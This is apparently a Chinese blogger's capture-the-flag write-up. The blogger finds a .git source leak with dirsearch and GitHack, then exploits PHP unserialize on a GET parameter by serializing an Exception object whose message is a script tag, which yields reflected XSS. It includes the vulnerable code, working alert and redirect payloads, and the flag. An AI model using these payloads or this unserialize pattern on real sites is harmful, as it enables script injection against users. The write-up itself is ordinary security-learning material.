又回来了,当初看不懂,现在看起来也很nb(Exception类没了解过)
首先是个git源码泄露,开始用dirsearch扫的时候很快,但全是429,后来用了-s 延迟(单位:s)选项成功扫出.git泄露。
亲自实验-s 0.5也可以,稍微快了点。用githack下载源码,index.php
内容如下所示
<?php
$a = $_GET['yds_is_so_beautiful'];
echo unserialize($a);
说他是反序列化吧,我没见过这种形式的,也不太清楚;说他不是反序列化吧,他有个unserialize函数,糟了是不会的感觉,看wp知道还有这种反序列化。反序列化还能做xss弹窗,下面是弹窗payload的来源
<?php
$a = new Exception("<script>alert(1)</script>");
echo urlencode(serialize($a));
?>
不知道flag是怎么触发的,光弹窗是没flag的,只有完成了自动跳转才会set-cookie里面就是flag,出题的原理还是不太明白
下面的payload能获得flag
<?php
$a = new Exception("<script>window.location.href='http://blog.a16ne.cn'</script>");
echo urlencode(serialize($a));
?>
得flag
<?php
echo urldecode("flag%7Ba7ced1fb-37c2-477e-acfd-765551d606ed%7D%0A");
?>
路还很长,一天起码一题